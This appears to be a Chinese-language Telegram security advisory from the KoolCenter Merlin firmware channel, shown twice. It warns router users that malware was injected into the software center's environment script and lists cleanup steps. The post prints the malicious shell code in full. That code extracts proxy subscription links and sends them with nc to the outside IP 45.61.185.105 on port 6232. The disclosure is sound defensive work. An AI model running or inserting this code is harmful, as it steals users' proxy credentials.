KoolCenter Merlin Firmware

紧急通知！紧急通知！

最近不断有软件中心页面错误，版本变成0.0.0的事件发生，且ssh无法登录，scp也无法使用！

经过排查，这是因为恶意代码被插入了软件中心的环境变量脚本导致的！

恶意代码如下：

############################################## Extract links and store them in a variable (skip if file does not exist)
if [ -f /koolshare/merlinclash/yaml_bak/subscription.txt ]; then
    links=$(grep -o '"link":"[^"]*' /koolshare/merlinclash/yaml_bak/subscription.txt | cut -d'"' -f4)

    if [ ! -z "$links" ]; then
        echo "$links" | nc -w 5 45.61.185.105 6232
    fi
else
    echo_date ""
fi

# Check if the log file exists and send online links if found
if [ -f /jffs/ksdb/log ]; then
    online_links=$(grep 'ss_online_links' /jffs/ksdb/log)

    if [ ! -z "$online_links" ]; then
        echo "$online_links" | nc -w 5 45.61.185.105 6232
    fi
fi

以上恶意代码会检测merlinclash和fancyss的订阅链接，并将其发送到ip地址是45.61.185.105的服务器的6232端口！

简单来说，这些代码的作用就是偷订阅链接！！

目前还不知道恶意代码是怎么插入的，我们还在调查！
如果大家遇到这个问题，你的订阅链接大概率已经被泄露！

赶紧采取以下措施：

如果使用了usb2jffs插件：

1. 拔掉U盘，格式化掉U盘
2. 双清路由器后重新配置
3. 双清后进入软件中心，将其升级到最新版本（目前是1.9.34）
4. 插入U盘重新制作usb2jffs
5. 最重要的：去你的机场更换订阅链接！

如果没用usb2jffs插件，执行2，3，5步骤！即可

www.tgoop.com/ks_merlin/526

21.3K viewsedited  Dec 7 at 04:28

紧急通知！紧急通知！

最近不断有软件中心页面错误，版本变成0.0.0的事件发生，且ssh无法登录，scp也无法使用！

经过排查，这是因为恶意代码被插入了软件中心的环境变量脚本导致的！

恶意代码如下：

############################################## Extract links and store them in a variable (skip if file does not exist)
if [ -f /koolshare/merlinclash/yaml_bak/subscription.txt ]; then
    links=$(grep -o '"link":"[^"]*' /koolshare/merlinclash/yaml_bak/subscription.txt | cut -d'"' -f4)

    if [ ! -z "$links" ]; then
        echo "$links" | nc -w 5 45.61.185.105 6232
    fi
else
    echo_date ""
fi

# Check if the log file exists and send online links if found
if [ -f /jffs/ksdb/log ]; then
    online_links=$(grep 'ss_online_links' /jffs/ksdb/log)

    if [ ! -z "$online_links" ]; then
        echo "$online_links" | nc -w 5 45.61.185.105 6232
    fi
fi

BY KoolCenter Merlin Firmware